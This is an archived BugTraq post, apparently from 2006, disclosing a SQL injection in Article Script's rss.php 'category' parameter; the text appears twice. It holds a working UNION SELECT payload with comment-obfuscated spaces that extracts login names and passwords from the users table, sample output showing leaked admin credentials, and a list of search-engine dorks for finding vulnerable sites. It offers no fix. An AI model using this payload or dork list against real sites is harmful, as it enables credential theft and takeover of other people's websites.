BugTraq
Back to list
|
Post reply
Article Script v1.*and v1.6.3 Sql injection
Nov 06 2006 12:35AM
liz0 bsdmail org
Article Script v1.*and v1.6.3 Sql injection
Script Name :Article Script
Home Page:www.articlescript.org
Bug Founder :Liz0ziM
Mail:liz0 (at) bsdmail (dot) org [email concealed]
Baba Kimdir? Tabiki Liz0ziM
------------------------------------------------------------
:D
http://www.victim.com/articles/rss.php?category= ' sql İnjection
Example:
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**
/1,2,login,password/**/from/**/users/*
<title>admin4521title> ------> Admin name :admin4521
<link>http://www.victim.com/articles/cs1120/page_1/link> ----------> Admin password cs1120
Dork:
"Powered by Article Script"
":: Article Script - New User Article ::"
intitle:":: Article Script -"
"Last Articles::"
Greatz My all friend
Source: http://www.blogcu.com/Liz0ziM/1312100/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Script Name :Article Script
Home Page:www.articlescript.org
Bug Founder :Liz0ziM
Mail:liz0 (at) bsdmail (dot) org [email concealed]
Baba Kimdir? Tabiki Liz0ziM
------------------------------------------------------------
:D
http://www.victim.com/articles/rss.php?category= ' sql İnjection
Example:
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**
/1,2,login,password/**/from/**/users/*
<title>admin4521title> ------> Admin name :admin4521
<link>http://www.victim.com/articles/cs1120/page_1/link> ----------> Admin password cs1120
Dork:
"Powered by Article Script"
":: Article Script - New User Article ::"
intitle:":: Article Script -"
"Last Articles::"
Greatz My all friend
Source: http://www.blogcu.com/Liz0ziM/1312100/
[ reply ]